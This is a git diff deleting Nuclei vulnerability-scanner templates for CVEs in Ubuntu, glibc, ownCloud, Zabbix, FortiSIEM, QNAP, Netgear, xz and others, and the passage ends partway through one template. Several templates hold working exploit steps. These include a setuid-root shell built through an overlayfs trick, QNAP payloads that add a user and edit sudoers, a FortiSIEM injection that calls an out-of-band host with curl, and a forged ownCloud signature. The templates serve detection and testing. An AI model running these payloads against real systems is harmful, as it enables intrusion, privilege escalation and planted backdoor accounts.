- cvss-score: 7.8
- cve-id: CVE-2023-32629
- cwe-id: CWE-863
- cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
- epss-score: 0.00042
- metadata:
- max-request: 2
- product: ubuntu_linux
- vendor: canonical
- verified: true
- tags: cve,cve2023,kernel,ubuntu,linux,privesc,local
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: |
- id
-
- - engine:
- - sh
- - bash
- source: |
- cd /tmp
- echo '#include \n#include \n#include \n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
- gcc test.c -o test
- unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
-
- matchers:
- - type: dsl
- dsl:
- - '!contains(code_1_response, "(root)")'
- - 'contains(code_2_response, "(root)")'
- condition: and
-# digest: 4a0a00473045022100cc36ed65fa01fe534699e2db622f418a3bb9470edd14eca1eba3138a2daebd4802207b1222e3e2dd3f5701821bab6d24e5cb9976223561e411372df8a2be3a71253c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-33922.yaml b/tmp/cve/CVE-2023-33922.yaml
deleted file mode 100644
index 4a40e148ad..0000000000
--- a/tmp/cve/CVE-2023-33922.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: CVE-2023-33922
-
-info:
- name: "Elementor <= 3.13.2 Authenticated(Contributor+) Arbitrary Post Type Creation via save_item"
- author: topscoder
- severity: medium
- description: "The Elementor plugin for WordPress is vulnerable to the creation of emergent resources due to insufficient input validation in the template "save_item" function in versions up to, and including, 3.13.3. This allows authenticated attackers, with contributor-level permissions or above, to create templates with an arbitrary post type, potentially allowing the exploitation of other plugins that depend on custom post types."
- reference:
- - https://www.wordfence.com/threat-intel/vulnerabilities/id/525cb51c-23f1-446f-a247-0f69ec5029d8?source=api-prod
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
- cvss-score: 5.4
- cve-id: CVE-2023-33922
- metadata:
- fofa-query: "wp-content/plugins/elementor/"
- google-query: inurl:"/wp-content/plugins/elementor/"
- shodan-query: 'vuln:CVE-2023-33922'
- tags: cve,wordpress,wp-plugin,elementor,medium
-
-http:
- - method: GET
- redirects: true
- max-redirects: 3
- path:
- - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt"
-
- extractors:
- - type: regex
- name: version
- part: body
- group: 1
- internal: true
- regex:
- - "(?mi)Stable tag: ([0-9.]+)"
-
- - type: regex
- name: version
- part: body
- group: 1
- regex:
- - "(?mi)Stable tag: ([0-9.]+)"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "elementor"
- part: body
-
- - type: dsl
- dsl:
- - compare_versions(version, '<= 3.13.3')
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-4863.yaml b/tmp/cve/CVE-2023-4863.yaml
deleted file mode 100644
index 8490973dab..0000000000
--- a/tmp/cve/CVE-2023-4863.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: CVE-2023-4863
-
-info:
- name: CVE-2023-4863
- author: dwisiswant0
- severity: high
- description: |
- Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187
- and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds
- memory write via a crafted HTML page.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-4863
- - https://github.com/mistymntncop/CVE-2023-4863
- - https://github.com/bbaranoff/CVE-2023-4863
- - https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863
- - https://github.com/OITApps/Find-VulnerableElectronVersion
- - https://github.com/GTGalaxi/ElectronVulnerableVersion
- - https://github.com/murphysecurity/libwebp-checker
-
-self-contained: true
-
-javascript:
- - code: |
- const fs = require('nuclei/fs');
- const isElectron = /Electron v.*/g,
- vulnPattern = /(VP8LBuildHuffmanTable|WebPCopyP(ixels|lane))/g,
- vulnVersions = [22, 24, 25, 26],
- safeString = 'VP8LHuffmanTablesAllocate';
- let vuln = false;
- try {
- const f = fs.ReadFileAsString(file);
- vuln = f.match(vulnPattern) && !f.includes(safeString);
- if (!vuln) {
- let electron = f.match(isElectron);
- if (electron[0] !== null) {
- for (const vulnVersion of vulnVersions) {
- vuln = electron[0].includes(vulnVersion.toString());
- if (vuln) break;
- }
- }
- }
- } catch (e) { vuln; }
- vuln;
-
- args:
- file: "{{file}}"
-
- matchers:
- - type: dsl
- dsl:
- - "success && response" # shorthand for 'success == true && response == true'
-
- extractors:
- - type: dsl
- dsl:
- - file
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-48725.yaml b/tmp/cve/CVE-2023-48725.yaml
deleted file mode 100644
index d70bc2e178..0000000000
--- a/tmp/cve/CVE-2023-48725.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: cve-2023-48725
-
-info:
- name: Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer overflow vulnerability (CVE-2023-48725)
- author: Caddyshack2175
- severity: high
- description: |
- A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 1.0.11.96 and 1.0.7.78. A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability. The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
- Netgear RAX30 1.0.11.96
- Netgear RAX30 1.0.7.78
- This request creates a crash of the client application due to a strcpy on an unchecked length into a stack-based buffer. This will occur whenever there is no message object inside of the data payload of the getblockschedule. This is entirely user controlled data.
-
- reference:
- - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1887
- - https://kb.netgear.com/000066037/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-the-RAX30-PSV-2023-0160
- tags: netgear, overflow, network, overflow, buffer, exploit, dos
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.2
- cve-id: CVE-2023-48725
- cwe-id: CWE-121
-http:
- - raw:
- - |-
- POST /cgi-bin/rex_cgi?csrftoken=2053576656 HTTP/1.1
- Host: {{Host}}
- Content-Length: 999
- Authorization: Basic YWRtaW46R00kY3ByMjdhYQ==
- Accept: application/json, text/javascript, */*; q=0.01
- X-Requested-With: XMLHttpRequest
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
- Content-Type: application/json; charset=UTF-8
- Origin: http://192.168.1.1
- Referer: http://192.168.1.1/DEV_name.html
- Accept-Encoding: gzip, deflate, br
- Accept-Language: en-US,en;q=0.9
- Cookie: session=Xa7mGpxoQNBlU9YObP5Yhga9HGgtDQIY
- Connection: close
-
- {"function":"getblockschedule","data":{"notamesg":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}
-
- redirects: false
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-49105.yaml b/tmp/cve/CVE-2023-49105.yaml
deleted file mode 100644
index 85e3bf9c3d..0000000000
--- a/tmp/cve/CVE-2023-49105.yaml
+++ /dev/null
@@ -1,87 +0,0 @@
-id: CVE-2023-49105
-
-info:
- name: OwnCloud - WebDAV API Authentication Bypass
- author: ChristianPoeschl,FlorianDewald,usdAG
- severity: critical
- description: |
- An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
- reference:
- - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
- - https://github.com/0xfed/ownedcloud
- - https://owncloud.org/security
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-49105
- cwe-id: CWE-287
- cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
- epss-score: 0.00091
- epss-percentile: 0.38353
- metadata:
- max-request: 2
- product: owncloud
- shodan-query: title:"owncloud"
- tags: cve,cve2023,code,owncloud,auth-bypass
-
-variables:
- username: admin
-
-code:
- - engine:
- - py
- - python3 # requires python to be pre-installed on system running nuclei
- source: |
- # build signature for presigned urls
- import base64, hashlib, datetime, os
- from urllib.parse import urlencode
-
- username = os.getenv('username')
- base_url = os.getenv('BaseURL')
- dav_url = f'{base_url}/remote.php/dav/files/{username}'
- oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
- data = {
- 'OC-Expires': '991200',
- 'OC-Verb': 'PROPFIND',
- 'OC-Credential': username,
- 'OC-Date': oc_date
- }
- sig_url = f'{dav_url}?{urlencode(data)}'
- # derive signature from empty sign key
- dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
- final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
- #final_url = f'{sig_url}&OC-Signature={dk.hex()}'
- print(final_url)
-
-http:
- - raw:
- - |
- PROPFIND {{code_response}} HTTP/1.1
- Host: {{Hostname}}
- Content-Type: text/xml
- Authorization: Basic {{base64('{{username}}')}}
-
- matchers-condition: or
- matchers:
- - type: dsl
- name: bypass-correct-user
- dsl:
- - status_code == 207
- - contains(body, 'owncloud.org')
- condition: and
-
- - type: word
- name: bypass-wrong-user
- part: body
- words:
- - User unknown
- - Sabre
- - Exception
- - NotAuthenticated
- condition: and
-
- extractors:
- - type: dsl
- dsl:
- - '"Username => "+ username'
-# digest: 4a0a00473045022100c83052cd67b0ace0260a06981566dedfe5355e346d73cc08201817df5a072c590220350dc5ce635ba42dd9a62eed7a671edfc4f9601a8ce02ff5f5e6bcfc6e63f4c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-4911.yaml b/tmp/cve/CVE-2023-4911.yaml
deleted file mode 100644
index 70f18f70ac..0000000000
--- a/tmp/cve/CVE-2023-4911.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: CVE-2023-4911
-
-info:
- name: Looney Tunables Linux - Local Privilege Escalation
- author: nybble04
- severity: high
- description: |
- A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- - https://www.youtube.com/watch?v=1iV-CD9Apn8
- - http://www.openwall.com/lists/oss-security/2023/10/05/1
- - http://www.openwall.com/lists/oss-security/2023/10/13/11
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-4911
- cwe-id: CWE-787,CWE-122
- epss-score: 0.01586
- epss-percentile: 0.87475
- cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: gnu
- product: glibc
- tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: |
- env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
- echo $?
-
- matchers:
- - type: word
- words:
- - "139" # Segmentation Fault Exit Code
-# digest: 490a0046304402202d08133fa6531aad4e00eb212908470e14839334ed5db3de00407ea2cee249660220021a38d5d167fb379028d9c9f8fecd46d3360fd546c566ad3767be0e9913cca4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2023-6246.yaml b/tmp/cve/CVE-2023-6246.yaml
deleted file mode 100644
index 25c06d08fb..0000000000
--- a/tmp/cve/CVE-2023-6246.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: CVE-2023-6246
-
-info:
- name: glibc's syslog - Local Privilege Escalation
- author: gy741
- severity: high
- description: |
- A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- - https://access.redhat.com/security/cve/CVE-2023-6246
- - https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2023-6246
- cwe-id: CWE-787,CWE-122
- epss-score: 0.00383
- epss-percentile: 0.72435
- cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: gnu
- product: glibc
- tags: cve,cve2023,code,glibc,linux,privesc,local
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: |
- (exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)
- echo $?
-
- matchers:
- - type: word
- words:
- - "127" # Segmentation Fault Exit Code
-# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2024-22120.yaml b/tmp/cve/CVE-2024-22120.yaml
deleted file mode 100644
index b21744ef6d..0000000000
--- a/tmp/cve/CVE-2024-22120.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: cve-2024-22120
-
-info:
- name: Zabbix Server - Authenticated Time-Based Blind SQL injection
- author: CodeStuffBreakThings
- description: Zabbix server can perform command execution for configured scripts. After a command is executed, an audit entry is added to "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
- severity: critical
- remediation: Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
- reference:
- - https://support.zabbix.com/browse/ZBX-24505#/
- - https://github.com/W01fh4cker/CVE-2024-22120-RCE
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 9.1
- cve-id: CVE-2024-22120
- tags: zabbix,sqli,cve,cve2024,cve-2024-22120
-
-variables:
- HOST: "{{Host}}"
- PORT: "{{Port}}"
- SID: "{{SID}}"
- HOSTID: "{{HOSTID}}"
-
-code:
- - engine:
- - py
- - python3
- source: |
- import os, struct, socket
- from datetime import datetime
- hostname=os.getenv('HOST')
- port=int(os.getenv('PORT'))
- sid=os.getenv('SID')
- hostid=os.getenv('HOSTID')
- zbx_header = "ZBXD\x01".encode()
- message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
- message_length = struct.pack('= 10 and zbx_header in response:
- print("Vulnerable to CVE-2024-22120")
-
- matchers:
- - type: word
- words:
- - "Vulnerable to CVE-2024-22120"
diff --git a/tmp/cve/CVE-2024-23108.yaml b/tmp/cve/CVE-2024-23108.yaml
deleted file mode 100644
index 5d319621ab..0000000000
--- a/tmp/cve/CVE-2024-23108.yaml
+++ /dev/null
@@ -1,50 +0,0 @@
-id: CVE-2024-23108
-
-info:
- name: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection - CVE-2024-23108
- author: thacien
- severity: critical
- description: An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.
- impact: Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected system.
- remediation: upgrade to FortiSIEM version >=6.4.4, >=6.5.3, >=6.6.4, >=6.7.9, >=7.0.3, >=7.1.2
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2024-23108
- - https://github.com/horizon3ai/CVE-2024-23108
- - https://www.horizon3.ai/attack-research/disclosures/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive
- - https://www.fortiguard.com/psirt/FG-IR-23-130
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2024-23108
- cwe-id: CWE-78
- epss-score: 0.00078
- cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
-metadata:
- verified: false
- max-request: 1
- vendor: fortinet
- product: fortisiem
- tags: CVE-2024-23108,fortisiem,network,cve,fortinet,rce,tcp,unauth
-variables:
- # generate the payload to send a curl request to an OOB server
- - exploit: '\n 127.0.0.1\n /test; curl -k "{{interactsh_url}}";\n\n'
- - payload: '{{51000000 + hex_encode(len("{{exploit}}")) + 0000006f421e4000000000}}'
-tcp:
- - host:
- - "tls://{{Hostname}}"
- port: 7900
- # send payload with exploit
- inputs:
- - data: '{{hex_decode("{{payload}}") + exploit}}'
- read-size: 2048
- matchers-condition: and
- # if oob server receives and http request
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
- - type: status
- part: interactsh_request
- status:
- - 200
diff --git a/tmp/cve/CVE-2024-25414.yaml b/tmp/cve/CVE-2024-25414.yaml
deleted file mode 100644
index 0984a113f6..0000000000
--- a/tmp/cve/CVE-2024-25414.yaml
+++ /dev/null
@@ -1,55 +0,0 @@
-id: CSZ-CMS-RCE-Benign-Test
-
-info:
- name: CSZ CMS 1.3.0 RCE (Benign Test)
- author: machevalia
- severity: medium
- description: |
- This template tests for the CSZ CMS 1.3.0 Remote Command Execution vulnerability by uploading a harmless payload and executing a benign command.
- reference:
- - https://www.cszcms.com/
- tags: rce,cms,benign
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}/admin/login"
- body:
- username=admin@admin.com&password=password&login_submit=Login
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Dashboard"
- part: body
-
- - method: POST
- path:
- - "{{BaseURL}}/admin/upgrade"
- body:
- upgrade_file=@data/payload.zip
- matchers:
- - type: status
- status:
- - 200
-
- - method: GET
- path:
- - "{{BaseURL}}/exploit.php"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "www-data" # Assuming a typical web server user on Linux
- - type: status
- status:
- - 200
-
-payloads:
- - name: payload.zip
- content: |
- UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==
- # Base64 encoded benign zip containing PHP code for whoami execution
diff --git a/tmp/cve/CVE-2024-27130.yaml b/tmp/cve/CVE-2024-27130.yaml
deleted file mode 100644
index b63847d769..0000000000
--- a/tmp/cve/CVE-2024-27130.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: CVE-2024-27130
-
-info:
- name: Remote Code Execution in NAS File Management in QNAP QuTSCloud c5.1.7.2739 build 20240419
- author: colcs25
- severity: high
- description: This template checks for Remote Code Execution (RCE) vulnerability via Buffer Overflow in NAS file management via the ssid parameter.
- command -> nuclei -t CVE-2024-27130.yaml -u (target URL) -var ssid=(ssid value)
- tags: rce, cve
- remediation: Fixed in QTS 5.1.7.2770 build 20240520
- reference:
- - https://github.com/watchtowrlabs/CVE-2024-27130
- - https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/
- - https://nvd.nist.gov/vuln/detail/CVE-2024-27130
- classification:
- cve-id: CVE-2024-27130
- cve-Base-Score: 7.2
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L
-
-requests:
- - raw:
- - |
- POST /cgi-bin/filemanager/share.cgi HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Connection: close
-
- ssid={{ssid}}&func=get_file_size&total=1&path=/&name={{payload}}
- attack: pitchfork
- payloads:
- payload:
- - "/../../../../usr/local/bin/useradd -p '$(openssl passwd -6 password)' watchtowr #"
- - "/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config #"
- - "/../../../../bin/echo watchtowr ALL=\\(ALL\\) ALL >> /usr/etc/sudoers #"
- - "/../../../../usr/bin/killall -SIGHUP sshd #"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "HTTP/1.1 200 OK"
- part: header
- extractors:
- - type: regex
- part: body
- regex:
- - "watchtowr"
diff --git a/tmp/cve/CVE-2024-3094.yaml b/tmp/cve/CVE-2024-3094.yaml
deleted file mode 100644
index 413ca3d822..0000000000
--- a/tmp/cve/CVE-2024-3094.yaml
+++ /dev/null
@@ -1,62 +0,0 @@
-id: CVE-2024-3094
-
-info:
- name: XZ - Embedded Malicious Code
- author: pdteam
- severity: critical
- description: |
- Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
- reference:
- - https://www.openwall.com/lists/oss-security/2024/03/29/4
- - https://access.redhat.com/security/cve/CVE-2024-3094
- - https://arstechnica.com/security/2024/03/backdoor-found-in-widely-used-linux-utility-breaks-encrypted-ssh-connections/
- - https://aws.amazon.com/security/security-bulletins/AWS-2024-002/
- - https://bugzilla.redhat.com/show_bug.cgi?id=2272210
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2024-3094
- cwe-id: CWE-506
- epss-score: 0.00079
- epss-percentile: 0.32887
- cpe: cpe:2.3:a:tukaani:xz:5.6.0:*:*:*:*:*:*:*
- metadata:
- verified: true
- vendor: tukaani
- product: xz
- tags: cve,cve2024,local,code,xz,backdoor
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: |
- # find path to liblzma used by sshd
- path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"
-
- # does it even exist?
- if [ "$path" == "" ]
- then
- echo probably not vulnerable
- exit
- fi
-
- # check for function signature
- if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
- then
- echo probably vulnerable
- else
- echo probably not vulnerable
- fi
-
- matchers:
- - type: word
- words:
- - "probably vulnerable"
-
- extractors:
- - type: dsl
- dsl:
- - response
-# digest: 4b0a00483046022100ac6864410c93e586885b4473cebffd245bb5c0448e7ece0ab162f92f0ecfe4f302210092315c5373e9393c838e7b5e78d7dbc755ccaf673efdb536ec799630299352e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/cve/CVE-2024-38526.yaml b/tmp/cve/CVE-2024-38526.yaml
deleted file mode 100644
index 445d1debf4..0000000000
--- a/tmp/cve/CVE-2024-38526.yaml
+++ /dev/null
@@ -1,56 +0,0 @@
-id: CVE-2024-38526
-
-info:
- name: CVE-2024-38526 - Untrusted 3rd party
- author: abut0n
- severity: high
- description: |
- The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io. However, in February of 2024, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io
- impact: |
- The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites.
- remediation: |
- Remove the dependecy.
- reference:
- - https://sansec.io/research/polyfill-supply-chain-attack
- - https://nvd.nist.gov/vuln/detail/CVE-2024-38526
- - https://x.com/triblondon/status/1761852117579427975
- tags: CVE,CVE-2024-38526,headless,supply-chain
-
-headless:
- - steps:
- - args:
- url: "{{BaseURL}}"
- action: navigate
-
- - action: waitload
-
- - action: script
- name: extract
- args:
- code: |
- () => {
- return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
- }
-
- extractors:
- - type: kval
- part: extract
- name: urls
- internal: true
- kval:
- - extract
-
- matchers:
- - type: word
- words:
- - "polyfill.io"
- # More domains that have been used by the same actor to spread malware since at least June 2023: bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com.
- - "bootcdn.net"
- - "bootcss.com"
- - "staticfile.net"
- - "staticfile.org"
- - "unionadjs.com"
- - "xhsbpza.com"
- - "union.macoms.la"
- - "newcrbpc.com"
- part: urls
diff --git a/tmp/cve/CVE-2024-45488.yaml b/tmp/cve/CVE-2024-45488.yaml
deleted file mode 100644
index 3350706ffc..0000000000
--- a/tmp/cve/CVE-2024-45488.yaml
+++ /dev/null
@@ -1,318 +0,0 @@
-id: CVE-2024-45488
-
-info:
- name: SafeGuard for Privileged Passwords < 7.5.2 - Authentication Bypass
- author: iamnoooob,rootxharsh,pdresearch
- severity: critical
- description: |
- One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.
- reference:
- - https://blog.amberwolf.com/blog/2024/september/cve-2024-45488-one-identity-safeguard-for-privileged-passwords-authentication-bypass/
- - https://blog.amberwolf.com/blog/2024/september/skeleton-cookie-breaking-into-safeguard-with-cve-2024-45488/
- - https://gist.github.com/rxwx/c968b3324e74058208fe6e168fd8730f
- - https://support.oneidentity.com/kb/4376740/safeguard-for-privileged-passwords-security-vulnerability-notification-defect-460620
- - https://support.oneidentity.com/product-notification/noti-00001628
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2024-45488
- epss-score: 0.00043
- epss-percentile: 0.09691
- metadata:
- verified: true
- max-request: 1
- shodan-query: html:"Safeguard for Privileged Passwords"
- tags: cve,cve2024,auth-bypass,safeguard
-code:
- - engine:
- - py
- - python3 # requires python to be pre-installed on system running nuclei
- source: |
- # pip install pycryptodome
- from datetime import datetime, timedelta
- from Crypto.Cipher import AES, DES3
- from Crypto.Hash import HMAC, SHA1, SHA512, SHA256
- from Crypto.Util.Padding import pad
- from io import BytesIO
- import argparse
- import string
- import base64
- import uuid
- import os
-
- class DPAPIBlob:
- CALG_3DES = 0x6603
- CALG_AES_256 = 0x6610
-
- CALG_SHA1 = 0x8004
- CALG_SHA_256 = 0x800c
- CALG_SHA_512 = 0x800e
-
- def combine_bytes(self, *arrays):
- return b''.join(arrays)
-
- def hmac_sha512(self, key, data):
- hmac = HMAC.new(key, digestmod=SHA512)
- hmac.update(data)
- return hmac.digest()
-
- def derive_key_raw(self, hash_bytes, alg_hash):
- ipad = bytearray([0x36] * 64)
- opad = bytearray([0x5C] * 64)
